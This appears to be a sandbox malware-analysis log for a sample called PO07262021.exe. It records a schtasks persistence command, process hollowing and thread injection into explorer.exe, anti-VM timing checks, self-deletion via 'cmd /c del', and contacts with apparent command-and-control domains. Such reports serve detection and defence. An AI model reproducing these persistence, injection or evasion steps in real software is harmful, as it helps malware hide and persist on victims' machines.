          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011FA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,15_2_011FA0D2
          Source: C:\Users\user\Desktop\PO07262021.exeFile created: C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2388:120:WilError_01
          Source: C:\Users\user\Desktop\PO07262021.exeMutant created: \Sessions\1\BaseNamedObjects\fKCtYnPDseQYKUqQUyihPKJYaez
          Source: C:\Users\user\Desktop\PO07262021.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB7D9.tmpJump to behavior
          Source: PO07262021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO07262021.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO07262021.exeVirustotal: Detection: 58%
          Source: PO07262021.exeReversingLabs: Detection: 73%
          Source: C:\Users\user\Desktop\PO07262021.exeFile read: C:\Users\user\Desktop\PO07262021.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO07262021.exe 'C:\Users\user\Desktop\PO07262021.exe'
          Source: C:\Users\user\Desktop\PO07262021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\FzGSUpCvLNF' /XML 'C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO07262021.exeProcess created: C:\Users\user\Desktop\PO07262021.exe C:\Users\user\Desktop\PO07262021.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO07262021.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO07262021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: PO07262021.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO07262021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.752806137.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO07262021.exe, 00000007.00000002.767621920.0000000001190000.00000040.00000001.sdmp, cmd.exe, 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: PO07262021.exe, 00000007.00000002.768387188.00000000014E0000.00000040.00000001.sdmp, cmd.exe, 0000000F.00000000.765256590.00000000011D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO07262021.exe, 00000007.00000002.767621920.0000000001190000.00000040.00000001.sdmp, cmd.exe
          Source: Binary string: cmd.pdb source: PO07262021.exe, 00000007.00000002.768387188.00000000014E0000.00000040.00000001.sdmp, cmd.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.752806137.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041703E push esi; iretd 7_2_0041704D
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041E36F push ecx; iretd 7_2_0041E380
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041E3D4 push FBA9C29Ch; ret 7_2_0041E3DB
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00417596 push esp; iretd 7_2_004175CC
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_004175A0 push esp; iretd 7_2_004175CC
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041CEB5 push eax; ret 7_2_0041CF08
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041CF6C push eax; ret 7_2_0041CF72
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041CF02 push eax; ret 7_2_0041CF08
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041CF0B push eax; ret 7_2_0041CF72
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00416FD2 push 00000035h; retf 7_2_00416FD8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E76BD push ecx; ret 15_2_011E76D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E76D1 push ecx; ret 15_2_011E76E4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ABD0D1 push ecx; ret 15_2_03ABD0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 6.94520727658
          Source: C:\Users\user\Desktop\PO07262021.exeFile created: C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exeJump to dropped file

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\PO07262021.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\FzGSUpCvLNF' /XML 'C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp'

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xEB
          Source: C:\Users\user\Desktop\PO07262021.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\PO07262021.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO07262021.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 00000000010598E4 second address: 00000000010598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 0000000001059B5E second address: 0000000001059B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO07262021.exe Code function: 7_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PO07262021.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PO07262021.exe TID: 6692 Thread sleep time: -46734s >= -30000s
          Source: C:\Users\user\Desktop\PO07262021.exe TID: 6716 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5968 Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4984 Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 15_2_011F31DC FindFirstFileW,FindNextFileW,FindClose
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 15_2_011D85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 15_2_011E245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 15_2_011DB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 15_2_011E68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose
          Source: C:\Users\user\Desktop\PO07262021.exe Thread delayed: delay time: 46734
          Source: explorer.exe, 00000009.00000000.752500086.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000009.00000000.722521161.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.718856258.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.722521161.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.713227262.0000000004791000.00000004.00000001.sdmpBinary or memory string: 0ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
          Source: explorer.exe, 00000009.00000000.713177380.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000009.00000000.752500086.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000009.00000000.722572636.000000000A64D000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA~
          Source: explorer.exe, 00000009.00000000.722788045.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000009.00000000.752500086.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000009.00000000.722870452.000000000A782000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000009.00000000.752500086.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO07262021.exe; Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO07262021.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\PO07262021.exe; Code function: 7_2_00409A90 rdtsc 7_2_00409A90
          Source: C:\Users\user\Desktop\PO07262021.exe; Code function: 7_2_0040ACD0 LdrLoadDll, 7_2_0040ACD0
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 15_2_011F2258 IsDebuggerPresent, 15_2_011F2258
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 15_2_011FB5E0 mov eax, dword ptr fs:[00000030h] 15_2_011FB5E0
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 15_2_011F1914 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap, 15_2_011F1914
          Source: C:\Users\user\Desktop\PO07262021.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 15_2_011E7310 SetUnhandledExceptionFilter, 15_2_011E7310
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 15_2_011E6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_011E6FE3
          Source: C:\Users\user\Desktop\PO07262021.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Domain query: www.winabeel.com
          Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe; Domain query: www.ppneumatic.com
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\PO07262021.exe; Memory written: C:\Users\user\Desktop\PO07262021.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\PO07262021.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO07262021.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\PO07262021.exe; Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cmd.exe; Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\PO07262021.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\PO07262021.exe; Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 11D0000
          Source: C:\Users\user\Desktop\PO07262021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\FzGSUpCvLNF' /XML 'C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess created: C:\Users\user\Desktop\PO07262021.exe C:\Users\user\Desktop\PO07262021.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO07262021.exe'Jump to behavior
          Source: explorer.exe, 00000009.00000000.732433250.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000009.00000000.732800237.0000000001080000.00000002.00000001.sdmp, cmd.exe, 0000000F.00000002.913554181.0000000005040000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000009.00000000.732800237.0000000001080000.00000002.00000001.sdmp, cmd.exe, 0000000F.00000002.913554181.0000000005040000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000009.00000000.732800237.0000000001080000.00000002.00000001.sdmp, cmd.exe, 0000000F.00000002.913554181.0000000005040000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000009.00000000.732800237.0000000001080000.00000002.00000001.sdmp, cmd.exe, 0000000F.00000002.913554181.0000000005040000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000009.00000000.722788045.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,15_2_011E3F80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,15_2_011D96A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,15_2_011D5AEF
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
